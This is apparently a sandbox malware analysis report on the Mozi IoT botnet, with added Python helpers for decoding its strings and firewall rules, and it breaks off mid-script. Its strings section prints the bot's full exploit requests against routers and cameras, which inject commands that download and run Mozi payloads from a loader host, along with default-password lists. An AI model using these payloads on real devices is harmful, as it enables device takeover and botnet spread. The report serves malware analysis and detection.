                Source: alsa-info.sh0.6.drString found in binary or memory: http://www.pastebin.ca.
                Source: alsa-info.sh0.6.drString found in binary or memory: http://www.pastebin.ca/upload.php
                Source: /tmp/Mozi.m (PID: 4580)HTML file containing JavaScript created: /usr/networksJump to dropped file
Source: Initial sample | String containing 'busybox' found: busybox
Source: Initial sample | String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample | String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample | String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample | String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample | String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample | String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample | String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample | String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample | String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample | String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample | String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Source: Initial sample | String containing potential weak password found: admin
Source: Initial sample | String containing potential weak password found: default
Source: Initial sample | String containing potential weak password found: support
Source: Initial sample | String containing potential weak password found: service
Source: Initial sample | String containing potential weak password found: supervisor
Source: Initial sample | String containing potential weak password found: guest
Source: Initial sample | String containing potential weak password found: administrator
Source: Initial sample | String containing potential weak password found: 123456
Source: Initial sample | String containing potential weak password found: 54321
Source: Initial sample | String containing potential weak password found: password
Source: Initial sample | String containing potential weak password found: 12345
Source: Initial sample | String containing potential weak password found: admin1234
Source: Initial sample | Potential command found: POST /cdn-cgi/
Source: Initial sample | Potential command found: GET /c HTTP/1.0
Source: Initial sample | Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample | Potential command found: GET %s HTTP/1.1
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample | Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample | Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample | Potential command found: mount -o remount,rw /overlay /
Source: Initial sample | Potential command found: mv -f %s %s
Source: Initial sample | Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample | Potential command found: GET /c
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample | Potential command found: killall -9 %s
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample | Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample | Potential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample | Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample | Potential command found: GET /%s HTTP/1.1
Source: Initial sample | Potential command found: POST /%s HTTP/1.1
Source: Initial sample | Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample | Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample | Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample | Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample | Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample | Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample | Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample | Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample | Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample | Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample | Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
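The request templates above carry their shell payload in three encodings: '+' for a space inside CGI query strings, ${IFS} (the shell's field separator) where a literal space would break the URL, and backtick or $( ) command substitution inside SOAP bodies. The script below is added here as an example; it is not code from the sample or from the sandbox. It normalises each template to the command the target device would run and lists the stage files the command fetches. The template strings are copied from the list above (the %s:%d placeholders are the loader host and port the bot fills in at run time).

```python
"""Pull the injected shell command out of each exploit request template.

Added example for this report, not code from the sample or the sandbox.
TEMPLATES is constructed from the 'Potential command found' strings above.
"""
import re
from urllib.parse import unquote_plus

TEMPLATES = {
    "netgear_setup_cgi": "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0",
    "jaws_shell": "GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1",
    "language_swedish": "GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0",
    "cgi_bin_ifs": "GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m",
    "tr064_set_ntp": '<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>',
    "huawei_upgrade": '<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>',
}

SEP = re.compile(r"\s*(?:;|&&|\|\|)\s*")        # shell statement separators
SUBST = re.compile(r"`([^`]+)`|\$\(([^)]+)\)")    # `...` and $(...) inside SOAP bodies
REQ_TARGET = re.compile(r"^[A-Z]+\s+(\S+)")       # request-target of an HTTP request line
PARAM_SPLIT = re.compile(r"(?<!&)&(?![&>])")      # '&' between params, but not '&&' or '&>'
VERB = re.compile(r"\b(?:wget|curl|tftp|busybox|chmod|sh)\b")


def decode_target(raw):
    """Undo the two space encodings the templates rely on."""
    return unquote_plus(raw).replace("${IFS}", " ")


def injected_command(template):
    """Return the shell text the template makes the device run, or ''."""
    if template.lstrip().startswith("<?xml"):
        # SOAP injections hide the command in the first command substitution.
        for m in SUBST.finditer(template):
            return (m.group(1) or m.group(2)).strip()
        return ""
    m = REQ_TARGET.match(template)
    if not m:
        return ""
    target = decode_target(m.group(1))
    if "?" in target:
        # Injection through a query parameter, or a bare query as in /shell?cmd.
        for param in PARAM_SPLIT.split(target.split("?", 1)[1]):
            if SEP.search(param) or VERB.search(param):
                return re.sub(r"^[\w.]+=", "", param).strip()
        return ""
    # Injection appended to the path: everything after the first separator.
    sep = re.search(r";|&&|\|\|", target)
    return target[sep.end():].strip() if sep else ""


def statements(command):
    """Split a command string into its individual statements."""
    return [s for s in SEP.split(command) if s]


def payloads(text):
    """Stage names fetched from the loader (Mozi.<architecture letter>)."""
    return sorted(set(re.findall(r"Mozi\.[a-z0-9]", text)))


def analyse(templates=TEMPLATES):
    return {name: {"steps": statements(injected_command(t)), "payloads": payloads(t)}
            for name, t in templates.items()}


if __name__ == "__main__":
    for name, info in analyse().items():
        print(name, info["payloads"])
        for step in info["steps"]:
            print("   ", step)
```

Every template follows the same shape once decoded: change into a writable directory, wipe it, fetch one stage with wget (busybox wget where the plain binary is missing), make it executable and run it with a tag naming the exploit path (jaws, varcron, tr064, huawei). That tag is what the bot reports back, so it doubles as an indicator of which vulnerability class brought a given device in.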
Source: ELF static info symbol of initial sample | .symtab present: no
Source: Mozi.m, type: SAMPLE | Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED | Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: classification engine | Classification label: mal100.spre.troj.evad.linM@0/221@4/0
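The SUSP_XORed_Mozilla hits above come from a YARA rule that pairs a string carrying the xor modifier (which matches under every single-byte XOR key) with the same string in plain form, and fires when only the XORed form is present. The scan below is added here as an example, not the rule itself and not code from the sample; it performs the same search directly so the key and offset can be recovered for further string decoding. SAMPLE is a constructed buffer with the user agent hidden under key 0x5A.

```python
"""Find "Mozilla/5.0" under any single-byte XOR key, the check behind
SUSP_XORed_Mozilla. Added example, not the YARA rule and not sample code."""

KEYWORD = b"Mozilla/5.0"


def xored_keyword_hits(buf, keyword=KEYWORD):
    """Return sorted [(offset, key)] for every position where buf XOR key == keyword.

    Key 0 (the plain string) is reported too; suspicious() decides what counts.
    """
    hits = []
    for key in range(256):
        needle = bytes(b ^ key for b in keyword)
        start = 0
        while (idx := buf.find(needle, start)) != -1:
            hits.append((idx, key))
            start = idx + 1
    return sorted(hits)


def suspicious(buf):
    """Mirror the rule's condition: an XORed copy exists and no plain copy does."""
    hits = xored_keyword_hits(buf)
    return any(k != 0 for _, k in hits) and not any(k == 0 for _, k in hits)


def decode_at(buf, offset, key, length=32):
    """Recover the surrounding plaintext once a key is known (same key assumed
    for the whole string, which holds for single-byte XOR obfuscation)."""
    return bytes(b ^ key for b in buf[offset:offset + length])


# Constructed sample: an ELF magic, the user agent XORed with 0x5A, then an
# unrelated plain string from the binary. Not bytes from the real sample.
SAMPLE = (b"\x7fELF"
          + bytes(b ^ 0x5A for b in b"Mozilla/5.0 (compatible)")
          + b"\x00GET /c HTTP/1.0\x00")

if __name__ == "__main__":
    for offset, key in xored_keyword_hits(SAMPLE):
        print(f"offset {offset:#x} key {key:#04x}: {decode_at(SAMPLE, offset, key)!r}")
    print("suspicious:", suspicious(SAMPLE))
```

The same loop generalises to any keyword worth hunting XORed (a C2 path such as /cdn-cgi/ or a known user agent); keep the plain-form exclusion, otherwise every legitimate HTTP client in the corpus matches under key 0.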

Persistence and Installation Behavior:

Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 4618) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
Source: /bin/sh (PID: 4652) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
Source: /bin/sh (PID: 4655) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
Source: /bin/sh (PID: 4699) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
Source: /bin/sh (PID: 4708) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
Source: /bin/sh (PID: 4736) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
Source: /bin/sh (PID: 4742) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
Source: /bin/sh (PID: 4761) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
Source: /bin/sh (PID: 4877) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4880) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4883) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4892) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4950) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4985) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 5011) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 5014) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 5019) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 5044) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 5079) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 5105) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 5121) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 5144) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 5152) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 5183) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 5201) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
Source: /bin/sh (PID: 5204) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
Source: /bin/sh (PID: 5207) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
Source: /bin/sh (PID: 5211) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
Source: /bin/sh (PID: 5232) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 14165 -j ACCEPT
Source: /bin/sh (PID: 5268) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
Source: /bin/sh (PID: 5303) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
Source: /bin/sh (PID: 5333) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
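The sandbox captured each rule twice, once with the long option spelling (--destination-port, --source-port) and once with the short one (--dport, --sport); the binary's strings show the same pairing, so whichever form the device's iptables build accepts takes effect. The script below is added here as an example, not part of the report or of the sample. It parses such command lines, collapses the two spellings, and separates the ports the bot opens for its own listener (56870/tcp and 14165/udp in this run) from the management ports it closes. LOG is constructed from the entries above plus the 22/23/2323 rules that appear in the strings section but were not observed executing in this run; the `mozi_like` threshold is an assumption for illustration, not a published rule.

```python
"""Summarise what a set of iptables inserts opens and closes.

Added example for this report, not part of Joe Sandbox or of the sample.
LOG is constructed from the executed-command entries above (plus the
22/23/2323 DROP rules from the strings section); one unrelated line is
included to show it is ignored.
"""
import re
from collections import Counter

LOG = """\
iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
iptables -I INPUT -p tcp --destination-port 58000 -j DROP
iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
iptables -I INPUT -p tcp --dport 58000 -j DROP
iptables -I INPUT -p tcp --destination-port 35000 -j DROP
iptables -I INPUT -p tcp --destination-port 50023 -j DROP
iptables -I INPUT -p tcp --destination-port 7547 -j DROP
iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
iptables -I INPUT -p tcp --dport 22 -j DROP
iptables -I INPUT -p tcp --dport 23 -j DROP
iptables -I INPUT -p tcp --dport 2323 -j DROP
killall -9 telnetd utelnetd scfgmgr
"""

RULE = re.compile(
    r"iptables\s+-I\s+(?P<chain>\w+)(?:\s+-t\s+(?P<table>\w+))?\s+-p\s+(?P<proto>tcp|udp)"
    r"\s+--(?P<opt>destination-port|dport|source-port|sport)\s+(?P<port>\d+)"
    r"\s+-j\s+(?P<target>ACCEPT|DROP)"
)

# Ports the binary closes with DROP: SSH/telnet, TR-069 (7547) and vendor
# remote-management ports (35000, 50023, 58000). Closing them keeps rival bots
# and the operator's ACS out of the device.
LOCKOUT_PORTS = {22, 23, 2323, 7547, 35000, 50023, 58000}


def parse_rules(text):
    """One dict per iptables insert; long/short option spellings are
    normalised to a direction so a rule issued twice yields equal dicts."""
    rules = []
    for line in text.splitlines():
        m = RULE.search(line)
        if not m:
            continue
        d = m.groupdict()
        d["port"] = int(d["port"])
        d["table"] = d["table"] or "filter"
        d["direction"] = "dst" if d["opt"] in ("destination-port", "dport") else "src"
        del d["opt"]
        rules.append(d)
    return rules


def classify(rules):
    opened = {(r["proto"], r["port"]) for r in rules if r["target"] == "ACCEPT"}
    dropped = {r["port"] for r in rules if r["target"] == "DROP"}
    # The same rule issued in both spellings shows up here as a duplicate.
    counts = Counter(tuple(sorted(r.items())) for r in rules)
    return {
        "opened": sorted(opened),
        "dropped": sorted(dropped),
        "lockout_hits": sorted(dropped & LOCKOUT_PORTS),
        "duplicate_rules": sum(1 for n in counts.values() if n > 1),
        # Assumed heuristic: opens its own port(s) and closes >= 3 lockout ports.
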